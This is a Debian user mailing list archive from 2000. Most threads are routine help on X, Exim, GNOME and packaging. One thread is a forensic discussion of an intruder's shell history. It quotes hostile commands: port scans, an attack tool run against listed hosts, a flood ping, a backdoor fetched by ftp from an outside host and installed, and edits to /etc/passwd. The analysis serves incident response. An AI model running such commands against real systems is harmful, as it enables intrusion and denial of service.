> used it.  There should be a log /var/log/XFree96.0.log.

Permedia 2 is supposed to be one of the better supported chipsets (via
glint).

Thanks for the PEX hint.  I'll look at that and get back to the list.

Thanks again

-Dan

-- 
"Beware he who would deny you access to information, for in his heart 
he dreams himself your master."


pgpMjsblH22Va.pgp
Description: PGP signature


Re: help outlook /outlook express

2000-05-03 Thread Touloumtzis, Michael
On Tue, May 02, 2000 at 07:41:32PM -0400, Robert Rossmoore wrote:
> hi i have outlook and outlook express is there a way to use just outlook to
> send and receve mail from thatplease advise

Hard to be sure what you're asking, but I'll guess that the question is
this (and if not maybe someone else will want to hear the answer ;-):
"How can I read MS-Exchange mail using Debian Linux instead of MS-Exchange
or Outlook clients?"

The company I work for uses MS Exchange with most folks (except me :)
using MS Exchange or MS Outlook clients.  Our Exchange server supports
POP3, so I just use fetchmail to download the mail to my Debian potato box
(every 2 hours during the night, and every 10 minutes during work hours).
For outgoing mail I use our standard SMTP mail host.  For a mail client
I use mutt.  All works okay, except for some MS-specific stuff like
.doc format attachments and the tnef mail format (vs. generic MIME).
All these have turned out to be things that can be worked around 99.9%
of the time with StarOffice, tnef2txt, etc.  I can use a Win95 machine
for the exception cases when all else fails.

So ... see if your system has POP3 download capability and SMTP sending
capability.  If so you're in business and the details can be worked out.

- Mike Touloumtzis

P.S. - One reason I use this setup (besides generally preferring Linux)
is that the mutt mail client makes reading mail lists like this one much
easier that would be the case with the standard MS mail clients.

-- 
Michael E. Touloumtzis
Computer Associates International


Re: bash_history from Cracked Computer

2000-05-03 Thread Joey Hess
Dzuy M. Nguyen wrote:
> Can someone help me figure out this "/.bash_history" from my
> computer that someone cracked into and did some damage.
> 
> I'll probably re-install the box, but I'd like to see what they did
> before I destroy it.  I've attached the "/.bash_history".

Let's cut it down some..

> cc anatomy.c -o anatomy
> cc kod.c -o kofd
> cp kofd kod
> rm kofd

According to google, kod and kofd are related to the oracle database.
It's possible this is a cooincidence, or he was using these names to try
to appear innocous (weird choices though; 'sh' is better..)

It's odd he made them and immediatly deleted them -- unless he was
logged in twice and went and used them in between.

> ./anatomy 216.209.196.154 22
> ./anatomy 216.209.205.68 22
> ./anatomy 216.209.207.150 22

I'd guess anatomy is some kind of port scanner. 22 is the ssh port.

> tar -zxvf bnc2_6_4_tar.gz
> cd bnc2.6.4
> ./configure
> make
> make install

bnc2 is a irc proxy server. Home page is http://bnc.dragondata.com/, a
file by the same name as what he untarred is at
http://bnc.dragondata.com/

> cd small
> mkdir .shit
> cd .shit
> chmod 777 *
> chmod +s *
> chmod 666 *
> chmod 777 *

I'd assume he is ftping or scping or something files onto your box,
since files seem to have just appeared here. Probably ftp, since the
permissions had to be fixed up. Might be useful to see if anything
shows up in the logs for daemons that can transfer files.

> ./pscan
> ./b
> ./pscan 167.64 111

Presumably a port scanner that operates on whole networks. Port 111 is
the run rpc port, so he's probably interested in nfs exploits or related
thing here.

> ./pscan 195.54 111
> cat wuftp.log
> ./b 195.54.3.134
> ./b 195.54.29.7
> ./b 195.54.221.21

It looks like 'b' is his mode of attack after he portscans and finds new
victims.

> ping -f newsforlinux.com

A little malicious flood pinging always brightens up the day..

> ftp columbia.digiweb.com
> tar -zxvf linux.tar.gz
> cd .bd
> ./install

Hm. Since columbia.digiweb.com has no open ftp server, or kernel mirror
that I can see, I doubt this is really the kernel.

> cat /etc/passwd
> pico /ec/passwd
> cat .bash_history
> passwd z
> cat /etc/passwd

Adds a user, be sure to delete that user immediatly... Of course, you
probably want to back up the system and reinstall from scratch.

-- 
see shy jo


Help with apachie

2000-05-03 Thread Brian Schramm
I am running Debian Slink.  I would like to know how to re-create the htaccess 
password
file that I deleted at som point.  I know it is simple but I cannot find the 
info anywere
including Apachie site.  I ran htpasswd -b .password username password but that 
did not fix it.

Can anyone help?

Thanks.

Brian Schramm
[EMAIL PROTECTED]
www.linuxexpert.org

 


Re: bash_history from Cracked Computer

2000-05-03 Thread w trillich
if you run updatedb via cron (or run it from the shell by hand
recently) it'll tell you if you have any of the evil files
on your computer:
locate pscan
locate wuftp
locate bnc2
locate .shit
locate anatomy
locate kod
locate '/b$'
if you find any source files (*.c or *.pl) consider finding a
debian guru to hand them to in case this kind of thing can be
snuffed in the future. might help, you never know.


here's my run thru the command history...

>cd /
>cd home
>cd .dead
>mkdir .dead
>cd .dead

somehow, your invader transferred some files here into
the /home/.dead/ at this point. must've used his own
ftp client, meaning he used your server--on my debian
box the FTP transfers are logged in 

/var/log/xferlog

see if you've still got yours. it might help.

>cc anatomy.c -o anatomy
>cc kod.c -o kofd

i'd guess that 'anatomy' scans your directory tree
and reports it back to the IP supplied as its
command-line argument. or it may copy everything.
maybe it scans the structure of the remote site.
don't know. (you may still have the source code;
if so, it might be helpful to hand it off to
some of the C++ gurus around here so they can
wedge it out of existence...)

>cp kofd kod
>rm kofd

hmm! he never directly called kod, but some of the other
programs may have.

>cd home
>cd httpd
>cd icons
>cd small
>cd .shit

looks like cut & paste, and maybe the last two didn't take.

>mkdir small
>cd small
>mkdir .shit
>cd .shit

so i guess he's now at /home/httpd/icons/small/.shit

>who

unless there's a logout and login to another directory,
more files were transferred here somehow.

>chmod 777 *
>chmod +s *
>chmod 666 *
>chmod 777 *
>./pscan
>./b
>./pscan 167.64 111

and it looks like PSCAN does a whole zone at a time.
to what end, i don't know.

down a bit, there's

>./pscan 198.138 111
>cat wuftp.log
>rm wuftp.log
>./pscan 198.59 111
>cat wuftp.log

so the PSCAN program creates "wuftp.log" i guess.

of course, he zapped it before checking out.
i'd bet it was in home/httpd/icons/small/.shit/
along with some other files... may still be there.

seemed to run the PSCAN on an ip net range, then check
the wuftp log file, apparently to get other IP ranges
to scan. ?

(you might try seeing if there's any left on the system.
may be informative.)


now THIS part i would consider very bad news:

>ftp columbia.digiweb.com
[obviously transferring linux kernel here]
>tar -zxvf linux.tar.gz
>cd .bd
>./install

(i know, it's all bad news, but some is badder than others.)

there's also a
>telnet 198.150.93.205

which reports as nonexistent just now, so it's probably a
transient or dynamically-allocated ppp-like address.

===

to find the where the IP's are he/she was interested in, 
(in case it helps any, or you want to contact their
sysadmins) i did this in tcsh:

% grep anatomy bash_history.txt | cut -f2 "-d "
216.209.196.154
216.209.205.68
216.209.207.150
212.1.128.61
212.1.128.61

% foreach x(`!!`)
foreach x ( `grep anatomy bash_history.txt | cut -f2 "-d "` )
foreach? nslookup $x
foreach? end

Name:HSE-Montreal-ppp33164.qc.sympatico.ca
Address:  216.209.196.154

Name:HSE-Montreal-ppp35364.qc.sympatico.ca
Address:  216.209.205.68

Name:HSE-Quebec-City-ppp35954.qc.sympatico.ca
Address:  216.209.207.150

Name:cache-1.www.telinco.net
Address:  212.1.128.61

Name:cache-1.www.telinco.net
Address:  212.1.128.61



maybe he/she had some friends in canada...?



and for the "./b" program:
foreach x ( `grep /b bash_history.txt | cut -f2 "-d " | sort | uniq` )
foreach? nslookup $x >> bash_crack
foreach? end
*** localhost can't find 156.26.120.34: Non-existent host/domain
*** localhost can't find 192.203.80.144: Non-existent host/domain
*** localhost can't find 198.150.93.205: Non-existent host/domain
*** localhost can't find 198.247.5.164: Non-existent host/domain
*** localhost can't find 204.116.202.5: Non-existent host/domain
*** localhost can't find 204.185.91.12: Non-existent host/domain
*** localhost can't find 206.252.255.42: Non-existent host/domain
*** localhost can't find 208.135.205.67: Non-existent host/domain
*** localhost can't find e150.135.112.129: Non-existent host/domain

Name:netman.net.okstate.edu
Address:  139.78.100.200

Name:www.safarir.com
Address:  142.169.8.215

Name:midian.arc.nasa.gov
Address:  143.232.55.1

Name:Westgate-AStar-OC3.Telcom.Arizona.EDU
Address:  150.135.112.129

Name:bccs.sunybroome.edu
Address:  192.203.130.28

Name:amber.inr.ac.ru
Address:  192.203.80.142

Name:photon.inr.ruhep.ru
Address:  192.203.80.149

Name:Galahad.Camelot.com
Address:  192.55.203.135

Name:atmr-ulcc.lmn.net.uk
Address:  194.83.100.85

Name:surw.chel.su
Address:  195.54.2.162

Name:gw.daily.ru
Address:  195.54.221.21

Name:tisa.alias.ru
Address:  195.54.29.7

Name:optima.mgn.chel.su
Address:  195.54.3.134

Name:ocotillo.sfps.k12.nm.us
Address:  198.59.112.9

Name:hebi.swcp.com
Addre

Re: Exim confiuration for virtual hosts

2000-05-03 Thread John Pearson
On Tue, May 02, 2000 at 03:36:05PM -0400, Chris Mason wrote
> Has anyone installed exim to provide mail serives to a number of domains. I
> have a webserver running virtual hosts and I would like to provide mail
> serives for those domains. Exim is running fine for sending mail buit I
> would like to receive the mail for those domains and put all the mail for
> each domain into the user account for that domain.
> Thanks for any help you can offer.
> 

Here's how I do it.
The virtual hosts (www.mydomain.com, mail.mydomain.com)
all have 'A' records pointing to my mail/web server; 
MX records don't work as well, because stupid mail
programs/systems put the MX host in the envelope.

My exim.conf contains (all single lines, however your mail client displays
them):

Main section:

local_domains = 
localhost:my.net.au:*.my.net.au:partial3-lsearch;/etc/exim/clients/domains

Directors:
A new director, to handle the virtual hosts:

virtual:
  driver = aliasfile
  except_domains = localhost:my.met.au:*.my.net.au
  domains = partial3-lsearch;/etc/exim/clients/domains
  no_more
  file = /etc/exim/clients/$domain_data
  search_type = lsearch*

All other directors have a line like

  domains = localhost:my.net.au:*.my.net.au

so that they aren't applied to the virtual hosts.

/etc/exim/clients/domains contains lines like

*.mydomain.com.au: mydomain

The second field is just an identifier, and for each
identifier there is another file, e.g., /etc/exim/clients/mydomain,
which works like a regular alias file, e.g.:

*: [EMAIL PROTECTED]

This setup is for virtual domains with three parts in their
domain name (e.g., *.mydomain.com.au); minor adjustment is
required if you use "American" style domains (e.g.,
*.somewhere.com), and you can mix them easily enough (with a
longer local_domains line and a further director).


HTH,


John P.
-- 
[EMAIL PROTECTED]
[EMAIL PROTECTED]
http://www.mdt.net.au/~john Debian Linux admin & support:technical services


Re: Exim confiuration for virtual hosts

2000-05-03 Thread John Pearson
On Wed, May 03, 2000 at 09:42:09AM +0930, John Pearson wrote
> On Tue, May 02, 2000 at 03:36:05PM -0400, Chris Mason wrote
> > Has anyone installed exim to provide mail serives to a number of domains. I
> > have a webserver running virtual hosts and I would like to provide mail
> > serives for those domains. Exim is running fine for sending mail buit I
> > would like to receive the mail for those domains and put all the mail for
> > each domain into the user account for that domain.
> > Thanks for any help you can offer.
> > 
> 
> Here's how I do it.
> The virtual hosts (www.mydomain.com, mail.mydomain.com)
> all have 'A' records pointing to my mail/web server; 
> MX records don't work as well, because stupid mail
> programs/systems put the MX host in the envelope.
> 

Aargh!  that should have been: CNAME records don't work as well,
because stupid mail programs/systems put the CNAME host in the
envelope.

> My exim.conf contains (all single lines, however your mail client displays
> them):
> 
> Main section:
> 
> local_domains = 
> localhost:my.net.au:*.my.net.au:partial3-lsearch;/etc/exim/clients/domains
> 
> Directors:
> A new director, to handle the virtual hosts:
> 
> virtual:
>   driver = aliasfile
>   except_domains = localhost:my.met.au:*.my.net.au
>   domains = partial3-lsearch;/etc/exim/clients/domains
>   no_more
>   file = /etc/exim/clients/$domain_data
>   search_type = lsearch*
> 
> All other directors have a line like
> 
>   domains = localhost:my.net.au:*.my.net.au
> 
> so that they aren't applied to the virtual hosts.
> 
> /etc/exim/clients/domains contains lines like
> 
> *.mydomain.com.au: mydomain
> 
> The second field is just an identifier, and for each
> identifier there is another file, e.g., /etc/exim/clients/mydomain,
> which works like a regular alias file, e.g.:
> 
> *: [EMAIL PROTECTED]
> 
> This setup is for virtual domains with three parts in their
> domain name (e.g., *.mydomain.com.au); minor adjustment is
> required if you use "American" style domains (e.g.,
> *.somewhere.com), and you can mix them easily enough (with a
> longer local_domains line and a further director).
> 
> 
> HTH,
> 
> 
> John P.
> -- 
> [EMAIL PROTECTED]
> [EMAIL PROTECTED]
> http://www.mdt.net.au/~john Debian Linux admin & support:technical services

-- 
[EMAIL PROTECTED]
[EMAIL PROTECTED]
http://www.mdt.net.au/~john Debian Linux admin & support:technical services


Re: Gnome gripes

2000-05-03 Thread John Pearson
On Tue, May 02, 2000 at 07:04:23PM -0400, David S. Bateman wrote
> could someone who has Gnome "working" post his/her configuation? I've
> edited Xsession according to _Learning Debian GNU/Linux :
> 
> #!/bin/bash
> xterm &
> gmc &
> enlightenment &
> panel
> exit 0
> ##
> 

I use this:
  #!/bin/bash
  exec gnome-session


That should be all you need, if gnome-session works for you.
Start the apps you want, select your window manager, disable
any session management that your window manager provides, save
your session in Gnome.  From there it should be automatic.


John P.
-- 
[EMAIL PROTECTED]
[EMAIL PROTECTED]
http://www.mdt.net.au/~john Debian Linux admin & support:technical services


Re: help outlook /outlook express

2000-05-03 Thread ktb
This is a mail list for people who are using Debian Linux.  What are you
asking exactly?  Outlook express won't work with Linux directly.  You
could use it if you networked your windows box to a Linux box which was
connected to the net.  
hth.
kent 

Robert Rossmoore wrote:
> 
> hi i have outlook and outlook express is there a way to use just outlook to
> send and receve mail from thatplease advise
> 
> robert and please respond to
> 
> [EMAIL PROTECTED]
> 
> thank you so much


Internal error installing recompiled kernel 2.2.14

2000-05-03 Thread mh
I've recompiled and installed kernels before and haven't had this
problem. I downloaded the kernel source and headers debs for 2.2.14,
rebuilt and recompiled the kernel source without any errors, then did a
make dep. Next, found the *Custom* kernel in /usr/src, and tried to
install it with make-kpkg kernel_image. It came back with "Internal
Error: (boot) is not a directory" and stopped.

I'm stuck. Any idea where I went astray?

thanks,

Michael Heyes
still using 2.2.13




Re: Gnome gripes

2000-05-03 Thread Eric Gillespie, Jr.
On Tue, May 02, 2000 at 07:04:23PM -0400,
David S. Bateman <[EMAIL PROTECTED]> wrote:
> edited Xsession according to _Learning Debian GNU/Linux :

I assume you mean ~/.xsession. I should hope the book wouldn't
advise that you screw up /etc/X11/Xsession.

> #!/bin/bash
> xterm &
> gmc &
> enlightenment &
> panel
> exit 0
> ##

The only thing that should be in ~/.xsession is

#!/bin/sh
exec gnome-session

> how do you get gdm working? do I really want to?

That's entirely up to you. I have a screenshot up at
, if you want to see what it
looks like. GDM offers something XDM doesn't: multiple types of X
sessions. By default, Debian comes with a Debian session (which
works just like logging in from XDM), an X session (similar to
the Debian session, but i can't remember the difference except
that it tries to use the X session manager, xsm), and a Gnome
session. The Gnome session ignores ~/.xsession, but you can run
programs from ~/.gnomerc if you want.

> how do you get the fonts (like in xterm) larger?

For xterm, you will need to add a line to ~/.Xresources like
this:

Xterm*font: fontname

For Gnome apps, this is in a rather unintuitive place. It's in
the "Theme Selector" section of the Control Center. For other
apps, there's no telling, but it might be an X resource.

-- 
Eric Gillespie, Jr. <*> [EMAIL PROTECTED]

"Let us be thankful we have commerce. Buy more. Buy more now.
 Buy. And be happy."
--OMM (THX 1138)


pgpsQjwkBZLBv.pgp
Description: PGP signature


MySQL *.deb's dependencies ignored? maybe?

2000-05-03 Thread w trillich
# dpkg -l mysql\*
Desired=Unknown/Install/Remove/Purge/Hold
| Status=Not/Installed/Config-files/Unpacked/Failed-config/Half-installed
|/ Err?=(none)/Hold/Reinst-required/X=both-problems (Status,Err: uppercase=bad)
||/ NameVersion Description
+++-===-===-===
un  mysql (no description available)
rc  mysql-base  3.21.33b-4  mysql database client binaries
in  mysql-bench 3.22.32-2   (no description available)
ii  mysql-client3.22.32-1   mysql database client binaries
un  mysql-dev (no description available)
un  mysql-devel   (no description available)
ii  mysql-doc   3.22.32-1   mysql database documentation
un  mysql-gpl-client  (no description available)
un  mysql-gpl-doc (no description available)
un  mysql-manual  (no description available)
ii  mysql-server3.22.32-1   mysql database server binaries
ii  mysql-shared3.22.32-2   MySQL - Shared libraries

so mysql-client is installed, yet

# apt-cache showpkg mysql-client
Package: mysql-client
Versions: 
3.22.32-1(/var/state/apt/lists/http.us.debian.org_debian_dists_frozen_non-free_binary-i386_Packages)(/var/lib/dpkg/status),
Reverse Depends:
  mysql-server,mysql-client
  webrt,mysql-client
  pike-mysql,mysql-client
  mysql-gpl-client,mysql-client
  mysql-gpl-client,mysql-client
  libmysqlclient6,mysql-client
  imp,mysql-client
  horde,mysql-client
Dependencies: [my indentation, for readability]
3.22.32-1 - 
  debianutils (2 1.6) 
  libdbi-perl (0 (null)) 
  perl5 (0 (null))   <== (i do have perl5.004 and 005)
  libmysqlclient6 (2 3.22.30) 
  libc6 (2 2.1.2) 
  libmysqlclient6 (2 3.22.30-2) 
  libncurses5 (0 (null)) 
  libreadline4 (2 4.1) 
  libstdc++2.10 (0 (null)) 
  libz1 (0 (null)) 
  mysql-server (0 (null)) 
  mysql-doc (0 (null)) 
  mysql-gpl-client (0 (null))<==
  mysql-base (0 (null))  <==
  libdbd-mysql-perl (3 1.1832) 
  mysql-gpl-client (0 (null))<==
  mysql-base (0 (null))  <==
Provides:
3.22.32-1 -
Reverse Provides:

so mysql-client (installed) depends on mysql-base (removed w/configs).
(items i marked above with <== are not installed). seems like an
"apt-get check" is in order!

# apt-get check
Reading Package Lists... Done
Building Dependency Tree... Done
#

aren't there some dependencies missing here, that is should find?

(mysql seems to work fine, server and client. i'm not complaining,
just alerting that--at best--i don't understand why there's no
red flag in the dependencies, or--at worst--there might be a
possible hole in the algorithm.)


Re: bash_history from Cracked Computer

2000-05-03 Thread Matthew Dalton
That's an awesome trail your cracker left there...!

Does anyone know what 'anatomy' and 'kofd/kod' are? Perhaps the source
is still on the machine in /root/.dead/home/.dead/dead/ (or something
like that)

It looks like he was performing port scans from your machine (./pscan IP
PORT entries). Don't know what './b' might be.

It might also be useful/fun to do a reverse dns on the IP addresses that
appear through this log. The first one is a traceroute to 193.254.35.18:

$ nslookup 193.254.35.18

Name:  dial03-ot0.logicnet.ro
Address: 193.254.35.18

(.ro is Romania)

It's unusual that he did a 'cat .bash_history', but didn't delete it.
Maybe it's a forgery?

Comments, people?

> "Dzuy M. Nguyen" wrote:
> 
> Can someone help me figure out this "/.bash_history" from my
> computer that someone cracked into and did some damage.
> 
> I'll probably re-install the box, but I'd like to see what they did
> before I destroy it.  I've attached the "/.bash_history".
> 
> Dzuy


Re: where are wmakers config files?

2000-05-03 Thread Corey Popelier
I found that the menu file turned out to be /etc/X11/WindowMaker/menu

Cheers,
 Corey Popelier
 http://members.dingoblue.net.au/~pancreas
 Work Email: [EMAIL PROTECTED]

On Tue, 2 May 2000, Ron Farrer wrote:

> 
> Where are wmakers config files? I keep editing ~/GNUstep/Default/WMState
> but evertime I log in it reverts back. There must be another one
> someplace? 
> 
> 
> TIA,
> 
> Ron
> -- 
> Email: 
> Home:  
> 
> Bellingham Linux Users Group: 
> Alpha Linux Orginization: 
> 


re:Gnome gripes

2000-05-03 Thread David S. Bateman
could someone who has Gnome "working" post his/her configuation? I've
edited Xsession according to _Learning Debian GNU/Linux :

#!/bin/bash
xterm &
gmc &
enlightenment &
panel
exit 0
##

basically I guess I'm running the aps without any " session" and I have
to reconstruct eveything everytime. Sooo...
where does "gnome-session" go, or should it be "exec gnome-session"?

how do you get gdm working? do I really want to?
is there anything I'm mising?
how do you get the fonts (like in xterm) larger?

I haven't used anything other than Gnome so I have no comparison but it
seems as though a little tuning is called for.

Thanks,
Dave


Re: Pergunta sobre a versao do Debian.

2000-05-03 Thread Paulo Henrique Baptista de Oliveira
Acho que isso não é possível.
Quoting Marcio Henrique Leiner ([EMAIL PROTECTED]):
> Desculpe, 
>   mas acredito que o subject esteja um pouco confuso. A questão, na
> realidade, não é sobre a versão do Debian, pois isto eu já sabia. O que eu
> queria saber era qual o release da mesma, tal como
> 
> Debian 2.1r2, 2.1r5, etc... 
>   Há alguma forma de descobrir qual o Release da versão que está em
> dada maquina? Quando eu dou um comando como /etc/debian_version só o que
> vejo é 2.1, mas sei que a máquina deve estar no release 3, 4 ou 5.
> 
> Bye,
> 
>   Marcio Henrique Leiner.
> 
> On Tue, 2 May 2000, Paulo Henrique Baptista de Oliveira wrote:
> 
> > cat /etc/debian_version
> > Quoting Marcio Henrique Leiner ([EMAIL PROTECTED]):
> > > Pessoal,
> > > 
> > >   estive dando uma olhada nas FAQs e não consegui descobrir como
> > > faço para saber qual é o release do debian que eu tenho. Eu consigo
> > > descobrir qual é a versão, mas o release não. Há alguma maneira de se
> > > descobrir isso olhando o sistema ou vendo algum arquivo separado?
> > > 
> > > Marcio Henrique Leiner.
> > > 
> > > 
> > > --  
> > > To UNSUBSCRIBE, email to [EMAIL PROTECTED]
> > > with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
> > > 
> > 
> > -- 
> > Abraços,PH
> > Linux Solutions - Renovando Conceitos - http://www.linuxsolutions.com.br
> > OLinux - O maior e melhor site de Linux do Brasil - http://www.olinux.com.br
> > Paulo Henrique Baptista de Oliveira -- [EMAIL PROTECTED]
> > Information Technology Consultant
> > 
> 
> 
> --  
> To UNSUBSCRIBE, email to [EMAIL PROTECTED]
> with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
> 

-- 
Abraços,PH
Linux Solutions - Renovando Conceitos - http://www.linuxsolutions.com.br
OLinux - O maior e melhor site de Linux do Brasil - http://www.olinux.com.br
Paulo Henrique Baptista de Oliveira -- [EMAIL PROTECTED]
Information Technology Consultant


Re: XF4.0 Modelines?

2000-05-03 Thread Eric G . Miller
On Tue, May 02, 2000 at 07:53:20AM -0400, Dan Brosemer wrote:
> My typical strategy for configuring X is to go through xf86config and then
> try to start X many times deleting modelines from the XF86Config file when
> they fail (my monitor stays black).  This worked great for all of the 3.3
> series
>
> I compiled XF86 4.0 and installed it, but when I tried this, I found that
> there were no modelines in the XF86Config file.  A search of xfree86.org
> yeilds nothing helpful, I was wondering if someone could tell me what
> happened to them or offer a better way of getting X working.

I just install the precompiled binaries Sunday.  You don't specify
modelines anymore, yeah! It figures them out all by itself. The new
xf86config should create a valid XF86Config file for you.  Beware, in
the precompiled binaries, xterm doesn't handle ANSI colors properly.
One of the Authors notified me that a patch to fix that problem didn't
get in to the official release.

> I have a Permedia 2 based reference board and a GoldStar Studioworks 78i
> monitor.  Entering the specs for the monitor (hsync and vrefresh) leave me
> with a blank screen (and the monitor in sleep mode) with both XF4.0 and
> 3.3.x.

Don't know anything about Permedia cards.  Did you check the supported
drivers list? Look for suspect "Options" or modules that may cause
problems.  The Xinstall.sh script warned about a couple (PEX, ??) when I
used it.  There should be a log /var/log/XFree96.0.log.


-- 
¶ One·should·only·use·the·ASCII·character­set·when·compos­

» ing·email·messages.



Re: gnus froze emacs20

2000-05-03 Thread Felix Natter
"Kovacs Istvan" <[EMAIL PROTECTED]> writes:

> Hello!
> 
> I tried gnus, recommended by several people (thanks to all who
> responded!), and it froze my emacs20. Here's what I wrote to John
> Hasler, one of the people trying to help:
> ---
> I installed gnus (gnus_5.8.3-9.deb) on top of Emacs20. I launched
> emacs, started the tutorial, it seemed to be working.
> Then, I typed: M-x gnus
> It loaded backquote, loaded gnus, displayed 'Done', some kind of
> ascii-art logo in the Emacs window, the title-bar changed to
> '[EMAIL PROTECTED]', and Emacs stopped working. The menus
> (Buffers, Tools and the like) stopped responding. I tried to close the
> window with the close button (under X), but it did not close. I had to
> switch to the terminal window and hit Ctrl-C.
> Started emacs again, and tried Tools->Read news and Read mail. Both
> loaded backquote and gnus, and both froze the same way as described
> above.
> 
> To tell you the truth, I have not read any of the documentation yet,
> except for the first few pages of the tutorial, but this doesn't look
> much good. Are there any switches that could help me determine what's
> going on and why emacs freezes?

I have had this problem with Emacs 20.3.1 and Gnus 5.6.x on a SuSE 6.0
system. I have never found out why it froze..

If you have an empty .emacs/.gnus(.el), then it should get stuck (but not
freeze) when trying to contact your news-server (which is ""). After
pressing C-g things should go on.

I recommend that you either remove the package and use the Gnus
that comes with the emacs you have
OR
you get the latest Gnus and emacs. If the problem persists, send a problem
description to gnu.emacs.gnus.
You can also ask there for questions, but look at the manual first -
the manual is very good IMHO.

Emacs is not hard to build, but the debian packaged version may be
preconfigured very well.

Gnus 5.6.x is not very old. 5.8 was released around 12/1999, and is
officially still "beta". I would still recommend using the new version
because you won't have to change configuration-files and you don't have
to get used to a new release once 5.8 is officially stable.

-- 
Felix Natter


Re: XF4.0 Modelines?

2000-05-03 Thread Felix Natter
Dan Brosemer <[EMAIL PROTECTED]> writes:

> My typical strategy for configuring X is to go through xf86config and then
> try to start X many times deleting modelines from the XF86Config file when
> they fail (my monitor stays black).  This worked great for all of the 3.3
> series.
> 
> I compiled XF86 4.0 and installed it, but when I tried this, I found that
> there were no modelines in the XF86Config file.  A search of xfree86.org
> yeilds nothing helpful, I was wondering if someone could tell me what
> happened to them or offer a better way of getting X working.
> 
> I have a Permedia 2 based reference board and a GoldStar Studioworks 78i
> monitor.  Entering the specs for the monitor (hsync and vrefresh) leave me
> with a blank screen (and the monitor in sleep mode) with both XF4.0 and
> 3.3.x.

1. check that your video-card is supported by xf4.0
2. if it's a recent monitor: xf4.0 supports some kind of channel that is
   used to collect hardware-specs.
3. the format for XF86Config has changed. Look at the current documentation
and then I assume you can just enter your current modelines in the format
required for xfree86 4.0.

... http://www.xfree86.org/4.0

- try www.linuxhardware.net, although I am not sure whether they
have monitor-specs
- search at www.deja.com (search newsgroups)
- try comp.os.linux.x or the other (xfree86-specific) newsgroup

-- 
Felix Natter


Re: Learning Linux

2000-05-03 Thread Felix Natter
Bryan Scaringe <[EMAIL PROTECTED]> writes:

> I originally came from the MS-DOS world to Linux using Matt Welsh's
> "Linux Installation and Getting Started".  It is part of the Linux
> Documantation Project, and hence, available at www.linuxdoc.org (click
> "Guides", should be the first one listed).  Note this was back about 3
> years ago I read it.  It probably won't cover a Debian install, (since
> most distributions have their own custom install programs), but provided
> you can get past the install, this guide should be invaluible.  (If you
> can't get past the install, go to the distributions website
> (www.debian.org, if you're using debian) and read their installation
> manuals).

This is definitely not a good book for covering installation-issues
(as you pointed out).
But if you are interested in becoming familiar with Linux/Unix and some
GNU software (including networking and programming), then reading this
book can be very useful.
So it's really not adequate for plain debian "users".

Other than that, I agree with this, especially since they have just
released an updated version of the book (the O'Reilly version was announced
- and I am sure they didn't leave out the www.linuxdoc.org-version ?).

-- 
Felix Natter


Re: GNOME Gripes

2000-05-03 Thread Felix Natter
"Eric G . Miller"  writes:

> On Mon, May 01, 2000 at 07:59:25PM -0700, Ross Boylan wrote:
> > I've been using GNOME for awhile in potato--my first encounter with
> > it.  It just doesn't seem ready.  I know potato is pre-release, and we
> > may not have the latest GNOME in it, and the GNOME folks are working
> > hard.
> > 
> > So I thought I'd gripe, check if this matches others experience, and
> > then maybe file some bug reports if I haven't made some configuration

to the original poster:
which version of gnome are you using ?
There is a much-improved 1.x out now (well, it is currently beta, but
will be released sometime soon: "April" GNOME).

> > goof.  I also have no idea if the problem is GNOME or the debian
> > integration of GNOME.
> > 
> > I'm running on i386, mostly with sawmill window manager.  gdm runs the show.
> > 
> > Stability:
> > Balsa crashes very frequently.

Balsa is something like 0.6.x, so consider using a different e-mail-client.
Since I am not aware of any stable GNOME email-clients, I would prefer
a text-based one or kmail if you've got KDE installed.

> > Features:
> > Session management is not there.  All my windows come back in the
> > first pane of the desktop.  There seems to be no way to get rid of
> > things once they are in there.  I tried closing them and resaving the
> > session.  I tried deleting them from the session configuration tool
> > (whose help button, by the way, does nothing).  The net result of this
> > is that I now have about 6 xman's running when I start up.



> > The features in most places are pretty thin--for example, balsa is not
> > very capable even when it is running.
> 
> I wouldn't judge the whole kit-n-kaboodle on one application.
> Especially, one that's slated for replacement.  However, I can't
> disagree that most of the GNOME apps have only a rudimentary
> functionality.  Still, the improvement over earlier generations is quite
> significant.  I read an interview of one of the GNOME developers
> recently who said GNOME is currently around the equivalent of early
> Windows or Windows 3 functionality.  So, it's well known there's still a
> ways to go.  
 
> > Aesthetics:
> > I think the default enlightenment theme--in fact most of the themes
> > for most of the window managers--are just ugly.  The default theme
> > makes it look as if you have a rusting scrap heap on your desk.
> > 
> > Only the NextStep derivatives have a decent look, to my eye.
> 
> GTK is just not very attractive.  GNOME can't do too much about that
> until the look of the base widget system is improved.  But, heck, it
> looks better than Tk apps!

there are themes available at gtk.themes.org (for example "aqua" a la
Mac-OS 9 or "informer" which aims to be plain). You can change this in the
control-panel (win95, motif and pixmap are included by default).
 
> > Internal Design:
> > I think GNOME's facilities and interfaces should have been done in
> > object oriented fashion.  Instead, it's got this clunky C interface
> > that reminds me of MS Windows.  I understand KDE went the other
> > route.  Yes, I know it can all be packaged in CORBA someday, but why
> > do the How to program for GNOME docs say (it has been awhile since I
> > looked) that the C interface is the native one?

because it is the lowest layer. all other language-bindings are stacked
on top of it.
 
> Well, I'm not going to get into a C vs. C++ flame war.  However, my
> rudimentary knowledge of the GNOME and GTK interface is that it *is*
> designed in the closest approximation to object-orientation that C can
> do.  I think there's a promising future for libglade with Python driving
> the show.  Then there's a bit more "object orientedness".  Still, you'd
> probably want to do heavy processing with a compiled language. 

There are also advantages of a C-based GNOME:
- usable from C-applications (like libxml)
- it seems that many fsf-programmers are most familiar with C
- many possibilities for scripting-languages.
- GNOME still uses CORBA, as opposed to KDE. maybe this is only possible
with the the fast C-implementation of CORBA: ORBit ?
(CORBA is a standard for network-transparent interface-definitions)
- C++-wrappers are available: Gtk-- and Gnome-- (gtkmm.sourceforge.net) 
 
-- 
Felix Natter


help outlook /outlook express

2000-05-03 Thread Robert Rossmoore
hi i have outlook and outlook express is there a way to use just outlook to
send and receve mail from thatplease advise


robert and please respond to

[EMAIL PROTECTED]


thank you so much


bash_history from Cracked Computer

2000-05-03 Thread Dzuy M. Nguyen



Can someone help me figure out this 
"/.bash_history" from my
computer that someone cracked into and did some 
damage.
 
I'll probably re-install the box, but I'd like to 
see what they did
before I destroy it.  I've attached the 
"/.bash_history".
 
Dzuy
w
ifconfig
ls -la
logout
exit
id
who
ping yahoo.com
who
finger
uname -a
ls -la
cd /
ls
cd root
ls
logout
exit
w
traceroute 193.254.35.18
 home
cd .dead
cd home
cd .dead
